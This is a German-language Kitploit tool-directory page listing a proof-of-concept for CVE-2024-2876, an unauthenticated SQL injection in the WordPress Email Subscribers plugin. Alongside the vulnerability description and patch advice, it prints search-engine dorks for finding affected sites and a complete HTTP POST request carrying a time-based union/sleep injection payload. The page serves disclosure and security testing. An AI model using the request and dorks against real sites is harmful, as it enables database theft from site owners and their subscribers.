Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-2876 — Proof-of-Concept-Exploit für CVE-2024-2876, eine nicht authentifizierte SQL-Injection-Schwachstelle im Email Subscribers Plugin für WordPress, die die Extraktion sensibler Daten ermöglicht. | Kitploit
Tools/GitHubGitHub/chsxthwik/cve-2024-2876
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubchsxthwik/cve-2024-2876

CVE-2024-2876

Proof-of-Concept-Exploit für CVE-2024-2876, eine nicht authentifizierte SQL-Injection-Schwachstelle im Email Subscribers Plugin für WordPress, die die Extraktion sensibler Daten ermöglicht.

Repository anzeigen
22vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-2876

#Beschreibung der Schwachstelle: Das Plugin „Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce“ für WordPress ist in allen Versionen bis einschließlich 5.7.14 anfällig für SQL-Injection über die run-Funktion der Klasse IG_ES_Subscribers_Query. Dies ist auf unzureichende Maskierung (Escaping) des benutzergesteuerten Parameters und fehlende ausreichende Vorbereitung der bestehenden SQL-Abfrage zurückzuführen. Nicht authentifizierte Angreifer können so zusätzliche SQL-Abfragen an bestehende Abfragen anhängen, um vertrauliche Informationen aus der Datenbank zu extrahieren.

#Dork: 1- FOFA : body="/wp-content/plugins/email-subscribers/" 2- publicwww : "/wp-content/plugins/email-subscribers/"

#POC: POST /wp-admin/admin-post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

#Youtube POC: https://www.youtube.com/watch?v=eDEGt_yXyvE

#Wie beheben? Da alle Versionen bis einschließlich 5.7.14 von der CVE betroffen sind, wird Benutzern empfohlen, das Plugin „Email Subscribers by Icegram Express“ auf Version 5.7.15 (oder die neueste Version 5.7.19) zu aktualisieren. Patchstack-Benutzer haben die Möglichkeit, automatische Updates speziell für anfällige Plugins zu aktivieren. Implementieren Sie eine WAF/WAAP-Lösung als zusätzliche Schutzschicht. Der Vorteil solcher Lösungen besteht darin, dass selbst bei neuen und unbekannten Schwachstellen (0-Day) Angriffe durch Erkennung von Ausbeutungsmustern und -techniken verhindert werden können.

#Ressource: https://www.wordfence.com/blog/2024/04/1250-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-email-subscribers-by-icegram-express-wordpress-plugin/

Tool herunterladen